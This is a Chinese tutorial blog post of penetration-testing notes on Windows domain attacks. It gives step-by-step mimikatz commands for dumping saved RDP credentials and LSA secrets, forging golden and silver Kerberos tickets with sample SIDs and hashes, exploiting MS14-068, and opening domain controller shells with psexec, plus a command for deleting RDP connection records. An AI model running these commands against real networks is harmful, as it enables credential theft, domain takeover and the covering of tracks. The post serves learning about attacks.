内网渗透-跨域环境渗透-1

目录

smbclient工具

mimikatz工具

Kerbers协议

NTLM认证

hash传递攻击(PTH攻击)

黄金票据攻击

白银票据

MS14-068


smbclient工具

在linux里面连接远程windows共享目录,可以使用这个工具
​
第一种连接方式:smbclient -L 目标IP -U username -W domain
smbclient -L 目标IP -U username%password -W domain
​
第二种连接方式:smbclient //目标IP/tmp/ -U username -W domain
smbclient //目标IP/tmp -U username%password -W domain

mimikatz工具

1、输入cmdkey /list 查看本地连接rdp的记录
​
2、dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*   查看本地的 Credentials,可以得到认证路径以及key值
​
3、使用mimikatz工具
使用 mimikatz 
输入 dpapi::cred /in:认证路径\key值
​
4、我们这时候会得到可用信息,我们记录guidMasterKey值
​
5、mimikatz.exe "" privilege::debug"" ""sekurlsa::dpapi full"" exit>>存放路径
​
6、这时候,我们就得到了导出来的guidMasterKey值的一些加密信息,记录一下加密情况下的密文以及masterkey的值
​
7、进入mimikatz
执行命令:
dpapi::cred /in:认证路径\key值/masterkey:key值  
​
8、这时候我们就得到了明文密码!
 

尽量不要手动删除注册表
​
del Default.rdp  这个命令就可以删除rdp连接记录!

Kerbers协议

Kerbers协议是一个身份验证机制,常用于windows域内!Kerbers协议可以有效的防止密码被嗅探和重放攻击!
在所有的通信过程中都是使用加密机制的,可以有效防止中间人攻击
​
身份验证过程:
​
1、认证服务器(AS): 用户向AS发送身份验证请求。AS生成用于用户和服务之间通信的临时密钥(票据授予票据 - TGT)。
票据授予服务器(TGS): 用户使用TGT请求特定服务的票据。TGS验证用户,然后生成用于与所需服务通信的票据。
票据:
​
2、票据授予票据(TGT): 用户向AS请求TGT,它包含用户身份信息和加密密钥。
服务票据: 用户使用TGT向TGS请求服务票据,该票据允许用户与特定服务进行通信。
​
3、单点登录(SSO): 用户只需通过一次身份验证即可访问多个服务,而不必为每个服务都提供凭据。
​
4、安全通信: 所有通信都使用加密密钥进行加密,防止中间人攻击。
黄金白银票据:
黄金票据(通票):伪造TGT
白银票据(专票):伪造TGS
​
整个过程都要通过DC域服务器的验证!  首先认证TGT然后认证TGS!
NTLM认证

NTLM使用挑战-响应机制进行身份验证,通常用于局域网中的Windows系统间的身份验证

hash传递攻击(PTH攻击)


黄金票据攻击

总结:
​
1、想要获取到黄金票据就需要tgt和域控的sid!
whoami /all  可得到域控的sid,也可以用mimikatz
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > 1.txt
​
2、有了tgt和sid就可以利用mimikatz进行黄金票据的伪造了
mimikatz.exe "kerberos::golden /user:xyz /domain:xyz.com /sid:S-1-5-21-116212833-2811902251-1975316662/krbtgt:789b3d4352b5a603c97cbfaf4b9a1046/ptt" exit
​
3、利用psexec调用目标域控的cmd
psexec.exe \\域名.域 cmd.exe

白银票据

总结:
​
1、想要获取白银票据,需要满足三个条件;域控的IP、域控的sid、域控的hash。
域控的IP: ping 123.com(域)
域控的sid:mimikatz或者whoami /all
域控的hash: mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > 2.txt 
​
2、伪造白银票据
mimikatz.exe "kerberos::golden /user:xyz /domain:xyz.com /sid:s-1-5-21-2511895695-3322341454-56546430
/target:WIN-9JK4CNGD41.xy.com /service:cifs /rc4:02c93f06b80c1feb55df4bcf6551c66e /ptt" exit
​
3、清除票据
klist purge

MS14-068

总结:
这个漏洞MS14-068不需要域控的管理员hash,只需要域内普通用户权限即可!
​
1、获取当前用户的sid  whoami /all
​
2、使用MS14-068提权工具生成伪造的kerberos协议证书
MS14-068.exe -u <userName>@<domainName> -p <clearPassword>s <userSid>-d <domainControlerAddr>
===
ms14-068.exe -u xyz@cc.com -p 123.com-s S-1-5-21-2511895695-3322341454-56546430-1104-d WIN-9JJK4CNGD41.cc.com
​
3、使用mimikatz将伪造证书写入
mimikatz.exe"kerberos::ptc TGT_xy@cc.com.ccache" exit
​
4、使用psexec提权即可
psexec.exe \\WIN-9JJK4CNGD41.cc.com cmd.exe

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值